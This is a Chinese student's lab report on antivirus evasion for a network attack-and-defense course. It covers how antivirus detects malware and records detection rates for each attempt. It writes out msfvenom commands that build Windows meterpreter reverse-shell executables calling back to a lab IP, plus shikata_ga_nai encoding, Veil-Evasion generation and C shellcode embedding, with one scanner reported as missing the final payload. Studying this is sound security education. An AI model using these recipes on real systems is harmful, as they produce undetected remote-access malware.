20145327 《网络攻防》 免杀原理与实践

20145327 《网络攻防》 免杀原理与实践

1.基础问题回答

(1)杀软是如何检测出恶意代码的?
通过特征码:对已存在的流行代码特征进行比对
通过行为:是否更改注册表行为,是否有设置自启动
(2)免杀是做什么?
防止杀毒软件查杀出来
(3)免杀的基本方法有哪些?
改变特征码:加壳;使用encode等进行编码;使用其他语言进行重写再编译,如veil-evasion。
改变攻击行为:在正常应用软件中插入恶意代码;
自己手动编写一个恶意软件;

2.实践总结与体会

通过这次实验了解了免杀原理,通过不同的方法避开杀毒软件的检测。恶意代码都是伪装的,不会被你轻易发现的,生活中一定要提高自己的网络安全意识呀,定期查杀电脑。

3.离实战还缺些什么技术或步骤?

我们都是固定的ip,实战中不会那么容易让我们成功的,黑客不是那么容易当的。

4.实践过程记录

msfvenom直接生成meterpreter可执行文件

使用命令msfvenom -p windows/meterpreter/reverse_tcp LHOST=192.168.43.54 PORT=444 -f exe > testcc.exe生成可执行文件然后提交到检测网站进行检测(名字为test20145327时提示包含非法字符)

  • 用Virscan检测,大多数软件都能查出病毒

Msfvenom使用编码器生成可执行文件

使用命令msfvenom -p windows/meterpreter/reverse_tcp -e x86/shikata_ga_nai -b ‘\x00’ LHOST=192.168.43.54 LPORT=444 -f exe > testcc1.exe来生成编码的可执行文件

  • 检测

    然而没什么作用

  • 那就试试多次编译,不信邪 指令加上-i 10即msfvenom -p windows/meterpreter/reverse_tcp -e x86/shikata_ga_nai -i 10 -b ‘\x00’ LHOST=192.168.43.54 LPORT=444 -f exe > testcc2.exe

  • 检测

    为什么还提高了,黑人问号.JPG。看来编码这个方法还是不行呀,不能免杀。

Veil-Evasion生成可执行文件

刘老kali里面自带了这个软件,命令行直接输入veil-evasion打开软件
在menu里面输入以下命令来生成可执行文件:

use python/meterpreter/rev_tcp
set LHOST 192.168.43.54
generate
5327-winmine
1
  • 成功生成如图

  • 检测

    这次明显提升了好多,25%Scanner(s) (10/39)found malware!

C语言调用Shellcode

  • 使用命令msfvenom -p windows/meterpreter/reverse_tcp LHOST=192.168.43.54 LPORT=444 -f c生成一个c语言格式的Shellcode数组

  • 然后用这个数组来编写一个程序,我用的是win10下的VS2013

  • 打开msf监听

  • 检测

    真是厉害了很多呢

  • 获取主机权限

  • 用360检测也未检测出

posted @ 2017-03-22 20:52  20145327高晨  阅读(248)  评论(0编辑  收藏  举报